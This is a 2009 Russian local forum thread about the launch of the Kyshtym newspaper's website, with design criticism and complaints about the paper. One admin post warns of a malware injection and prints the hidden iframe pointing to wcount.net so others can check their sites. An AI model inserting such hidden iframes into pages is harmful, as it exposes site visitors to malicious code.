Модераторы: Woodlion, KazanAlex

«Кыштымка» в электронном виде

# 

29 мар 2009, 13:46 

«Кыштымка» в электронном виде
Через считанные дни наша газета будет выходить и в электронной версии. На сайте «Кыштымского рабочего» пользователи интернета найдут анонсы газетных публикаций, будет организован приём рекламы и подписки как на традиционную печатную версию газеты, так и на электронную (с доставкой на E-mail). В будущем появится и форум читателей «КР». Сейчас сайт проходит стадию регистрации и настройки, по завершении которых мы опубликуем его адрес.

Кыштымский рабочий, 28 марта 2009 года, №034 (11610), стр. 01


Кыштымский рабочий. Газета Кыштымского городского округа.
Аватара пользователя
msshveikin
 
Сообщения: 4711
Изображения: 24
Зарегистрирован: Пт 15 июн 2007, 09:44
Откуда: Тихое Зимовье

СООБЩЕНИЯ

# 

3 апр 2009, 21:43 

KRadmin
Нет, нет... тут совсем не "нравится-не нравится". Наши претензии не надуманы. again может помочь вам исправить ошибки в дизайне. Я же только могу сказать, что за яркими прямоугольниками не воспринимается текст. А это газета. Но это ощущение дилетанта :)
А вообще... НАКОНЕЦ ТО! :)
Аватара пользователя
Woodlion
 
во первых я ничего не понял, во вторых я тоже не дурак!
Сообщения: 2184
Зарегистрирован: Вс 05 авг 2007, 20:02

# 

8 апр 2009, 04:37 

пока не будет приличного формата - не буду даже думать

хотя я отношусь последнее годы к этой газете как к бульварной пресе
namezys
 
Всё пройдет
Всё будет

mdc.ru - я это делал
Сообщения: 650
Зарегистрирован: Сб 01 сен 2007, 18:26
Откуда: Москва

# 

8 апр 2009, 09:38 

namezys писал(а):хотя я отношусь последнее годы к этой газете как к бульварной пресе


Я, к сожалению, тоже. :-!
Позволяют себе искажать факты в нужную им сторону. Нпример, недавно опубликовали информацию, что я проиграл им Арбитражный Суд. А суд-то я не проиграл. Да, мне отказали в иске, но не потому, что газета написала обо мне чистую правду, а потому что данные сведения не содержат порочащей меня информации ("О том, что иск, который нужно было направить в суд, пролежал без движения больше трёх месяцев, именно по вине Антона Ускова, утверждения нет"). Когда же я попросил опубликовать мой ответ (со ссылкой на указанный фрагмент решения суда), Чеботина Л.Н. написала, что не считает нужным это делать. У меня даже есть официальное её письмо об этом (могу отсканировать и опубликовать в форуме).
Здесь мне все предельно понятно: если народ узнает правду, это лишит их возможности считатся в общественном мнении "победителями юриста Ускова". Ведь победа-то пиррова. :bravo:
Аватара пользователя
AUskow
 
Вивалвивалракью. AUskow aka A.d'Vokat.
Сообщения: 1052
Зарегистрирован: Пт 22 июн 2007, 14:57
Откуда: Челябинск. В Кыштыме вырос

# 

8 апр 2009, 09:44 

Хотя, происхождение всех вышеназваных симптомов мне понятно. Город у нас маленький, в нем, можно сказать, что ничего не происходит. Война с УГМК кончилась (победой УГМК, ИМХО), до выборов далеко. А читателя надо чем-то завлекать. Вот и пишут все, что не попадя. То девушки пьяные без прав ездят, то макеты пулемётов продают. Кому это интересно, кроме бабушек-сплетниц на лавках, которые семечки грызут. :-!
Одно успокаивает (по части меня). О безликих ведь не судачат и серость не пародируют. Значит, не все так плохо.
Аватара пользователя
AUskow
 
Вивалвивалракью. AUskow aka A.d'Vokat.
Сообщения: 1052
Зарегистрирован: Пт 22 июн 2007, 14:57
Откуда: Челябинск. В Кыштыме вырос

# 

8 апр 2009, 09:48 

KRadmin
К Вам лично я отношусь с уважением и без негатива. Так что, все мои выпады в адрес КРабов, прошу не воспринимать на себя
Аватара пользователя
AUskow
 
Вивалвивалракью. AUskow aka A.d'Vokat.
Сообщения: 1052
Зарегистрирован: Пт 22 июн 2007, 14:57
Откуда: Челябинск. В Кыштыме вырос

# 

8 апр 2009, 12:10 

Кыштымский рабочий активно начинает рекламировать сайт.
Внимание!
Сайт "Кыштымского рабочего" - www.kr74.ru
Редакция предлагает всем желающим воспользоваться услугами по размещению рекламы на сайте, а также оформить подписку на электронную версию газеты. В скором времени появиться и форум читателей "КР"

Мы вместе с городом!
Будьте вместе с нами!


Кыштымский рабочий, 07 апреля 2009 года, №038 (11614), стр. 01
Аватара пользователя
msshveikin
 
Сообщения: 4711
Изображения: 24
Зарегистрирован: Пт 15 июн 2007, 09:44
Откуда: Тихое Зимовье

# 

8 апр 2009, 12:32 

msshveikin писал(а):Кыштымский рабочий активно начинает рекламировать сайт.

А сейчас без рекламы никуда :)

Сообщение: вчера ночью была предпринята попытка установки вредоносного ПО на сайт Кыштымского рабочего, а конкретно iframe сайта wcount.net, который посещать не рекомендую без антивируса. Указанный домен зарегистрирован (по данным WHOIS) в России, владелец из США, штат Калифорния. Сейчас сайт газеты работает нормально, вредоносный код удалён. Кстати, сегодня просмотрел пост про сайт Корсара, на этот сайт невозможно зайти, там та же проблема. Вредоносный код с того же wcount.net. Если у кого из форумчан есть сайты, рекомендую проверить исходники на наличие следующих вставок:
Код: Выделить всё
<html><body><div style="display:none"><iframe src="http://wcount.net/com/index.php" width="320" height="240"></iframe></div></body></html>

Когда пост уже был готов получил ответ от регистратора сайта wcount.net:
Viktor B. Ответил на ваш запрос .

-----------------------------------------------
(Viktor B.) [ 08 Apr 2009 10:25 AM ]
-----------------------------------------------
> Здравствуйте!
> По данным WHOIS у вас зарегистрирован домен wcount.net. Так вот, с этого сайта был установлен iframe на сайт http://kr74.ru. Вставку чужого кода я удалил, однако не факт, что подобное не повторится, в том числе с другими сайтами. Если у вас есть полномочия, то прошу принять меры.

Спасибо. Домен заблокирован.

--------------
Виктор Белошенко, [email protected]

_______________________________________________
Последний раз редактировалось KRadmin Ср 08 апр 2009, 12:37, всего редактировалось 2 раз(а).
KRadmin
 
Сообщения: 23
Зарегистрирован: Вт 31 мар 2009, 14:19

# 

8 апр 2009, 12:33 

Интересно, а домен chel.surnet.ru не настоящий? именно поэтому регистрация не проходит :-) Я понимаю, что для многих ящик на mail.ru это самый что ни на есть "реальный" адрес. Но все таки может подправить :-)
Surnet
 
Сообщения: 288
Зарегистрирован: Ср 12 сен 2007, 08:20
Откуда: Кыштым

# 

14 апр 2009, 16:38 

На сайте "Кыштымского рабочего" начал действовать форум. В данный момент на нём можно обсудить газетные публикации, высказать свои мнения о сайте и газете. BBCode, HTML и ссылки на форуме не поддерживаются. Смайлики тоже.
KRadmin
 
Сообщения: 23
Зарегистрирован: Вт 31 мар 2009, 14:19

# 

15 апр 2009, 09:17 

KRadmin писал(а):На сайте "Кыштымского рабочего" начал действовать форум.

Я там уже зарегистрировался. Достаточно достойно сделано. Кстати, сайт тоже сделан симпатично. Может быть некоторым эстетам и не поравится, а мне - понравилось. KRadmin - молодец (чего не скажешь про его шефа).
Аватара пользователя
AUskow
 
Вивалвивалракью. AUskow aka A.d'Vokat.
Сообщения: 1052
Зарегистрирован: Пт 22 июн 2007, 14:57
Откуда: Челябинск. В Кыштыме вырос

# 

15 апр 2009, 10:26 

KRadmin
Регистрация на форуме и сайте одна?
Аватара пользователя
msshveikin
 
Сообщения: 4711
Изображения: 24
Зарегистрирован: Пт 15 июн 2007, 09:44
Откуда: Тихое Зимовье

# 

15 апр 2009, 11:08 

msshveikin писал(а):KRadmin
Регистрация на форуме и сайте одна?

Да
KRadmin
 
Сообщения: 23
Зарегистрирован: Вт 31 мар 2009, 14:19

# 

15 апр 2009, 11:49 

Зашел на сайт

Где мои глаза? Кто это делал?
namezys
 
Всё пройдет
Всё будет

mdc.ru - я это делал
Сообщения: 650
Зарегистрирован: Сб 01 сен 2007, 18:26
Откуда: Москва

# 

15 апр 2009, 18:36 

Ладно, хватит ворчать :) При создании сайта на первом месте были создание функционала и обеспечение безопасности, а потом всё остальное. Работа над новым дизайном ведётся, правда в свободное от работы время. :)
KRadmin
 
Сообщения: 23
Зарегистрирован: Вт 31 мар 2009, 14:19

# 

15 апр 2009, 20:08 

Ты теперь официально работаешь в КР
Аватара пользователя
msshveikin
 
Сообщения: 4711
Изображения: 24
Зарегистрирован: Пт 15 июн 2007, 09:44
Откуда: Тихое Зимовье

НАПИСАТЬ ОТВЕТ

   Новые сообщения Новые сообщения    Нет новых сообщений Нет новых сообщений    Форум закрыт Форум закрыт   
cron